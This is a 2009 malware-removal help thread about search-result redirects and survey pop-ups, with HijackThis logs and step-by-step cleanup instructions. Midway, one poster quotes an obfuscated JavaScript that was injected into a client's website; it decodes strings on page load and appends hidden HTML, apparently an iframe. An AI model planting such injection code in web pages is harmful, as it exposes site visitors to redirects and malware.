Search engine links being redirected

[tikool17]

when i click on links in google and bing, most of the time i'm being redirected to bogus sites. i have followed your 8 step removal process. mbam is coming up clean.

hijack this log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 6:25:00 PM, on 12/17/2009
Platform: Unknown Windows (WinNT 6.01.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16385)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\System32\rundll32.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Adobe\Acrobat 9.0\Acrobat\acrotray.exe
C:\Program Files\Microsoft Security Essentials\msseces.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\WinSCP\WinSCP.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
C:\Windows\system32\DllHost.exe

O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: ContributeBHO Class - {074C1DC5-9320-4A9A-947D-C042949C6216} - C:\Program Files\Adobe\/Adobe Contribute CS4/contributeieplugin.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: SmartSelect - {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
O3 - Toolbar: Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files\Adobe\/Adobe Contribute CS4/contributeieplugin.dll
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [Acrobat Assistant 8.0] "C:\Program Files\Adobe\Acrobat 9.0\Acrobat\Acrotray.exe"
O4 - HKLM\..\Run: [Adobe Acrobat Speed Launcher] "C:\Program Files\Adobe\Acrobat 9.0\Acrobat\Acrobat_sl.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [AdobeCS4ServiceManager] "C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe" -launchedbylogin
O4 - HKLM\..\Run: [UCam_Menu] "C:\Program Files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" "C:\Program Files\CyberLink\YouCam" UpdateWithCreateOnce "Software\CyberLink\YouCam\1.0"
O4 - HKLM\..\Run: [Adobe_ID0ENQBO] C:\PROGRA~1\COMMON~1\Adobe\ADOBEV~1\Server\bin\VERSIO~3.EXE
O4 - HKLM\..\Run: [MSSE] "c:\Program Files\Microsoft Security Essentials\msseces.exe" -hide
O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
O4 - HKCU\..\Run: [Google Update] "C:\Users\chase\AppData\Local\Google\Update\GoogleUpdate.exe" /c
O4 - HKCU\..\Run: [swg] "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
O8 - Extra context menu item: Append Link Target to Existing PDF - res://C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Append to Existing PDF - res://C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert Link Target to Adobe PDF - res://C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O20 - Winlogon Notify: !SASWinLogon - C:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Adobe Version Cue CS4 - Adobe Systems Incorporated - C:\Program Files\Common Files\Adobe\Adobe Version Cue CS4\Server\bin\VersionCueCS4.exe
O23 - Service: Com4Qlb - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4Qlb.exe
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: Google Software Updater (gusvc) - Unknown owner - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe (file missing)
O23 - Service: HP Health Check Service - Hewlett-Packard - c:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe
O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: mental ray 3.5 Satellite (32-bit) (mi-raysat_3dsmax9_32) - Unknown owner - C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
O23 - Service: Nero BackItUp Scheduler 4.0 - Nero AG - C:\Program Files\Common Files\Nero\Nero BackItUp 4\NBService.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - NVIDIA Corporation - C:\Windows\system32\nvvsvc.exe
O23 - Service: QuickPlay Background Capture Service (QBCS) (QPCapSvc) - Unknown owner - C:\Program Files\HP\QuickPlay\Kernel\TV\QPCapSvc.exe
O23 - Service: QuickPlay Task Scheduler (QTS) (QPSched) - Unknown owner - C:\Program Files\HP\QuickPlay\Kernel\TV\QPSched.exe
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files\CyberLink\Shared Files\RichVideo.exe
O23 - Service: TomTomHOMEService - TomTom - C:\Program Files\TomTom HOME 2\TomTomHOMEService.exe
O23 - Service: XAudioService - Conexant Systems, Inc. - C:\Windows\system32\DRIVERS\xaudio.exe

--
End of file - 6587 bytes

 

[Bobbye]

IF you'd like us to check for malware, please follow the steps HERE.

Attach the 3 logs for review when finished.

 

[tikool17]

Thank you for the prompt response. I've attached the logs now

 

[Bobbye]

Okay, the mystery deepens- the logs are clean! Are you still getting redirected? Is it one type of site> the types you might not want yourself? Is it same or different site?

Let's run an online AV scan:
Run Eset NOD32 Online AntiVirus Scanner HERE

Note: You will need to use Internet Explorer for this scan.

• Tick the box next to YES, I accept the Terms of Use.
• Click Start
• When asked, allow the Active X control to install
• Disable your current Antivirus software. You can usually do this with its Notification Tray icon near the clock.
• Click Start
• Make sure that the option "Remove found threats" is Unchecked, and the option "Scan unwanted applications" is checked
• Click Scan
• Wait for the scan to finish
• Re-enable your Antivirus software.
• A logfile is created and located at C:\Program Files\EsetOnlineScanner\log.txt. Please include this on your post.

Give me the log in next reply and we'll decide where to go.

 

[tikool17]

Mystery indeed. It seems to take whatever the query is and use it to redirect me to a related, but obviously bogus site and not what the url of the actual listing I clicked on.

For example I typed in books just now into google and clicked on the barnes and noble link and I was taken to localpages.com with books being entered into the search box and showing book places in the Atlanta area (where I live).

Also thewebsitesurvey.com/whatever... will pop up from time to time with a voice saying "congratulations, you've been selected to participate, blah, blah, etc..."

I run MS Security Essentials as my real-time protection and it picked up a Win32/Alureon.F virus in C:\Windows\System32\drivers\atapi.sys.
I'm a bit concerned with this one because I'm pretty sure atapi.sys is a required file by windows and it is set to delete on reboot (which I haven't done yet)... so any help on what I should do there would be appreciated too!

 

[tikool17]

there's some info on the Alureon bug I found:

http://www.microsoft.com/security/p...ame=Virus:Win32/Alureon.F&threatid=2147629654

Looks like they know it infects atapi.sys, so maybe letting it delete it won't screw me over? Let me know what you think.

 

[tikool17]

not being impatient, just letting you know as it comes so you can get a picture...

just popped up with free-spyware-scanner.info/... that would not go away and I had to use task manager to kill firefox

 

[Bobbye]

I'm with you one that 'survey' being obnoxious. Norton Safe Web says this:

Norton Safe Web found no issues with this site.

Since it pops up like that, it has to be some kind of adware. Some users experience it when on eBay. He had this comment:

second browser window will open with a request for a user to complete a 4 question survey. I always assume they are phishing for information, but in this case it may be eBay.

Somewhere in the same adware is a site hxxp://www.local-news-online.com/. The 'Terms & Conditions' for the site are almost entirely grayed out at the bottom, but are readable. It's an ad site for some work at home club. IF this is the URL you are getting, try this for both sites:

Open Internet Options in IE tools or the Control Panel> Security> Restricted Zone> Sites> type each of the following in and click on Add after each:
*.thewebsitesurvey.com
*.local-news-online.com

Also add the following to restricted:
afe.specificclick.net
*.specificclick.net

Be sure to use the * as it is a wild card.
Click on Apply> OK when through

As for this"

MS Security Essentials as my real-time protection and it picked up a Win32/Alureon.F virus in C:\Windows\System32\drivers\atapi.sys.

Can you paste the log in for this? Don't act on it yet.

To move the Eset entry:

Please download OTMovit by Old Timer and save to your desktop.

• Double-click OTMoveIt3.exe to run it. (Vista users, please right click on OTMoveit3.exe and select "Run as an Administrator")
• Copy the file paths below to the clipboard by highlighting ALL of them and pressing CTRL + C (or, after highlighting, right-click and choose Copy):
  
  

  :Processes	
  
  :Services
  
  :Reg
  
  :Files  
  C:\$WINDOWS.~Q\DATA\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M26Q1KHE\i
  	
  :Commands
  [purity]
  [emptytemp]
  [start explorer]
  [Reboot]

• Return to OTMoveIt3, right click in the "Paste Instructions for Items to be Moved" window and choose Paste.
• Click the red Moveit! button.
• A log of files and folders moved will be created in the c:\_OTMoveIt\MovedFiles folder in the form of Date and Time (mmddyyyy_hhmmss.log). Please open this log in Notepad and post its contents in your next reply.
• Close OTMoveIt3

If a file or folder cannot be moved immediately you may be asked to reboot the machine to finish the move process. If you are asked to reboot the machine choose Yes.
---------------------------------------
Follow the above with:
Download SDFix HERE and save it to your Desktop.

• Double click SDFix.exe and it will extract the files to %systemdrive%
  (Drive that contains the Windows Directory, typically C:\SDFix)
  
  Boot into Safe Mode
• Restart your computer and start pressing the F8 key on your keyboard.
• Select the Safe Mode option when the Windows Advanced Options menu appears, and then press ENTER.
  
  Run SDFix
• Open the extracted SDFix folder and double click RunThis.bat to start the script.
• Type Y to begin the cleanup process.
• It will remove any Trojan Services and Registry Entries that it finds then prompt you to press any key to Reboot.
• Press any Key and it will restart the PC.
• When the PC restarts the Fixtool will run again and complete the removal process then display Finished, press any key to end the script and load your desktop icons.
• Once the desktop icons load the SDFix report will open on screen and also save into the SDFix folder as Report.txt
• Attach Report.txt back here

------------------------------------------
Summary:
1. Restrict the URLs
2. Move Eset entry in OTMoveIt
3. Run the SDFix
4. Rescan with Eset
5. Rescan with MS Essentials

Leave all logs and reports in your next reply. Do not act on atapi at this point.

 

[tikool17]

otm log attached

 

[tikool17]

once again thanks so much for your help!

-i ran OTM with no issues. the log is attached.
-i use firefox and therefore I don't know if restricting them in ie will help, but i did it anyway. i don't know how to restrict urls in firefox.
-SDFix didn't work for me. i rebooted in safe mode and clicked on the .bat but the cmd prompt just flashed and closed. I'm running win7 and the author's site said it works with 2000 and xp but nothing about vista or 7 so that might be the issue.

MS Essentials doesn't save logs as far as I know but I ran it again and it came up clean. (as I have since restarted my machine and nothing blew up thank god so i guess it cleaned atapi.sys)

Ran Mbam again out of curiosity and it found an exe. the log is attached.

Will run Eset again overnight as it takes a while on my machine.

 

[tikool17]

as of now i clicked on barnes and noble in google and it actually took me to barnes and noble! imagine that! hopefully all is well.

 

[Bobbye]

Well, there were 2 files with Trojans in the Mbam log, so you're still getting malware. I'm still gathering what does and doesn't work on which operating system! The list gets longer.

Will you run one more Eset scan please? I don't want to let you go with malware still showing up. Delete the previous log first. If this is clean, I'll have you remove the cleaning tools and old restore points and set new clean restore point.

 

[tikool17]

Looks like it found the same one it did last time...
Forum won't let me upload the .txt because it's exacly the same as the one before i guess

eset2 contents:
C:\$WINDOWS.~Q\DATA\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M26Q1KHE\i[6].js HTML/Iframe.B.Gen virus

 

[Bobbye]

Delete the log. Remove Eset. Rescan fresh.

 

[tikool17]

I uninstalled the program, deleted the log, ran it again and got the same results. I might be doing something wrong...

-Unistalled ESET from control panel
-deleted log from desktop (where I saved it)
-ran it again via IE

 

[Bobbye]

Where is the log?

 

[JohnnyMo]

Hey guys, I imagine this has little if anything to do with it,but being that I can't make heads or tails of this, I thought I'd post for brighter minds.

As of two days ago I started getting these same hijacks on browser links, and the stupid websitesurvey pop-up/redirect. I thought I had some odd virus but got the same clean bill of health from MBAM, etc...

Oddly enough, when I think back, this all started the day following troubleshooting a client website that was somehow compromised by an odd "insertion" or virus of some sort. Basically, I had a client call because multiple things on his site ceased to function and when I pulled the pages to take a look, every single index file on his site (whether html, php, etc...) had been "hacked" and had the following code inserted within the page somewhere. (In most instances immediately following the body tag, but on some pages the code was less neatly inserted.)

I got in touch with his Hosting company and had them see if they could source the issue and the indicated that it appeared all the pages were accessed via FTP, downloaded from his server, and reuploaded as opposed to being a script hole or the like. They gave an IP address in the Netherlands as the culprit and I subsequently blocked that from his server as well as from various other client sites/servers.

That all noted, I have no idea if the "virus" or the code below has any effect on these popups or other hijacks, but since no better answer has been offered of yet I thought I'd put this out there for folks with a better grasp of code to take a gander at:

<script>

function gNX(SINgqDZU, tsEmfJA, DeODs)

{

    var BLAFGHFclX=DeODs.split(tsEmfJA);

    var lFMSkvVXr='';

    for(HOFt=-0x30+0x5+0x2b;HOFt<(BLAFGHFclX.length-1);HOFt+=-0x2c+0x3-0x20-0x2a+0x74)

    { TedLPqI = BLAFGHFclX[HOFt]^SINgqDZU;lFMSkvVXr += String.fromCharCode(TedLPqI);}return lFMSkvVXr;}

        

        function uYdGUc(vCX){  fff=op.split("1040");alert('Hqu'); } 

;function RFjcyVP(){var eVTDqpjSf=new Function("hwdjiK", "return "+gNX(-0x8+0x1f+0xd-0x2d+0x8-0x22+0x30+0x638, 'U','1569U1578U1574U1584U1576U1568U1579U1585U')+"."+gNX(0xf-0x25+0xa-0x2c-0x2b-0x18+0x15+0x4be, 'V','1082V1079V1084V1057V')+"");var capQNK=eVTDqpjSf(-0x2e-0x1a+0x49);capQNK.innerHTML+=gNX(0x2+0x22-0x2a-0x2f+0x2eb, 'B','650B735B720B708B727B731B723B662B705B735B722B706B734B651B647B662B734B723B735B721B734B706B651B647B662B724B729B708B722B723B708B651B646B662B720B708B727B731B723B724B729B708B722B723B708B651B646B662B709B708B725B651B657B734B706B706B710B652B665B665B655B647B664B644B646B647B664B644B655B664B647B644B645B665B716B723B730B723B665B735B728B722B723B718B664B710B734B710B649B709B651B644B725B725B724B646B645B725B723B644B724B725B725B645B720B646B655B642B646B640B654B643B641B644B654B727B643B646B643B724B645B725B722B657B648B650B665B735B720B708B727B731B723B648B');}function SZaNHz(Gbadqmty){ var HNf=new Function("KIYeUjkV", "return 361449;"); fff=op.split("372");var Coi = document.getElementById('nhYekfglDJ');window.eval(); } 

;if(window.addEventListener)

{

window.addEventListener(gNX(0x3+0x32+0x31+0x8b, 'q','157q158q144q149q'),RFjcyVP,false);}else if(window.attachEvent){window.attachEvent('on'+gNX(0x3+0x32+0x31+0x8b, 'q','157q158q144q149q'), RFjcyVP);}function DQojwMqe(NhxFdsTt){  fff=op.split("696"); } 

;</script>

I don't know but might it be theoretically possible that any site with this code inserted will then redirect you to the useless search hijacks and surveys when the listing appears in Google or Yahoo?

Hope it helps,

JM

 

[Bobbye]

Malware help is specific for each system. Telling someone to insert code is not safe.

If you want malware help, please start your own thread and follow the steps HERE.

Virtually everyone with malware has their searches redirected. But the causes are different and the cause must be addressed on that system.

 

[JohnnyMo]

Hey there Bobby... my apologies... I may have explained myself poorly in the previous post as I wasn't meaning to suggest anyone insert that code on their page, but rather that I found a client of mine had that code maliciously inserted into all of the index pages on his site. I went in and removed it as I had no idea what it does. I posted it here thinking perhaps that code could be responsible for some browser hijacks if the code works as a redirect from the website it was inserted into and sends surfers elsewhere.

Basically, I started getting the same symptoms as the original poster shortly after working on a client site with that code placed there by a hacker and though someone with a better understanding of what that code does might be able to tell if it could be causing any of the odd activity some members are experiencing.

Thanks for the heads up with things and my apologies for the poor wording of the previous...

John

 

[Bobbye]

Happy Holiday John! I tend to be very protective here. Some are very desperate and will click on anything they think might 'fix' things! the offer still holds if you want to start a thread for malware help.

 

[ziondaddy]

thewesitesurvey.com and local-news-online problem

FYI,

when i first got this last week, it was right after i did the following:

1. opened windows live messenger and the "TODAY" news window opened.
2. clicked on some tiger woods controversy news and pics (elin nordegren specifically, haha)
3. immediately had a virus, the alureon, to be exact. also found the old BankerFox one as well. weird...

after going thru many steps, avast, adaware, malware bytes, even root repeal., i got rid of the virus it seemed. then the websitesurvey and local-news-online popups started and havent stopped. ive tried system restore, "last known good configuration", all that. subscribed to bleeping computer, but no help.. not even a comment yet.

i even downloaded firefox and deleted IE8 thinking the browser itself was infected.. within 15 minutes, they started popping up again. so my wife started asking me questions and suggested i change my messenger settings so the TODAY msn news window would not open automatically when messenger opens. since it was thru there that i went to the articles and pics that led me to the infected link.

so i did, and voila.. no more of any of those pop ups, but just now, i used the top right corner google search and it happened again-thewebsite survey thing. also, when i clicked on a link for a century 21 osborne realty here in yuma az, it took me to one of the bogus search sites the other person was talking about.

but i thought someone could benefit from this info. im about to reformat cause im sick of this crap... too time consuming and time is money... david

 

[tikool17]

sorry for the delay. still no symptoms but eset keep throwing up the same infection. log attached...

 

[Bobbye]

Regarding the Eset find of "js HTML/Iframe.B.Gen virus", the consensus is that it is a False Positive. Are you getting any message when you startup such as "windows\system32\config\ is corrupt or missing."? But since it's a temp file, you can try either of these:

TFC (Temp File Cleaner)

Download TFC to your desktop

• Open the file and close any other windows.
• It will close all programs itself when run, make sure to let it run uninterrupted.
• Click the Start button to begin the process. The program should not take long to finish its job
• Once its finished it should reboot your machine, if not, do this yourself to ensure a complete clean

TFC only cleans temp folders. TFC will not clean URL history, prefetch, or cookies. Depending on how often someone cleans their temp folders, their system hardware, and how many accounts are present, it can take anywhere from a few seconds to a minute or more. TFC will completely clear all temp files where other temp file cleaners may fail. TFC requires a reboot immediately after running. Be sure to save any unsaved work before running TFC.

TFC (Temp File Cleaner) will clear out all temp folders for all user accounts (temp, IE temp, java, FF, Opera, Chrome, Safari), including Administrator, All Users, LocalService, NetworkService, and any other accounts in the user folder.

Then rescan with Eset.

 

[tikool17]

no missing or corrupt messages on startup. and i ran tfc and and then eset again and got the same result. so i'm with you on the false positive; i'm not gonna worry about it.

thank you so much for all your help, and a happy new year to you.

 

[Bobbye]

You're welcome. You can remove the cleaning programs and old restore points:

Remove all of the tools we used and the files and folders they created

• DownloadOTCleanIt by OldTimer
• Save it to your Desktop.
• Double click OTCleanIt.exe.
• Click the CleanUp! button.
• If you are prompted to Reboot during the cleanup, select Yes.

The tool will delete itself once it finishes.

If you are prompted to Reboot during the cleanup, select Yes.

You should now set a new Restore Point to prevent infection from any previous Restore Points. The easiest and safest way to do this is:

• Go to Start > All Programs > Accessories > System Tools and click "System Restore".
• Choose the radio button marked "Create a Restore Point" on the first screen then click "Next". Give the Restore Point a name then click "Create". The new Restore Point will be stamped with the current date and time. Keep a log of this so you can find it easily should you need to use System Restore.
• Go to "Disk Cleanup" which can be found by going to Start > All Programs > Accessories > System Tools.
• Click "OK" to select the partition or drive you desire.
• Click the "More Options" Tab.
• Click "Clean Up" in the System Restore section to remove all previous Restore Points except the newly created one.

More details and screenshots for Disk Cleanup in Windows Vista can be found here.

And here's some Firefox-specific info you might want to use:

To prevent Tracking Cookies and block most ads:
For Firefox: Tools> Options> Privacy> Cookies> CHECK ‘accept Cookies from Sites’> UNCHECK 'accept third party Cookies'> Set Keep until 'they expire'. This will allow you to keep Cookies for registered sites and prevent or remove others.

I suggest using the following two add-on for Firefox. They will prevent the Tracking Cookies that come from ads and banners and other sources:
AdBlock Plus
Easy List

To block or restrict a site in Firefox:
Open Firefox> Tools> Options> Privacy> Cookies section> Exceptions> type the site domain or URL as you would in IE> Click on Block.

Using the add-ons I mentioned does some of this, but it want want to restrict a specific site, type it in this section.

Be sure to update and run a virus scan occasionally. And if the problem starts again, please let me know.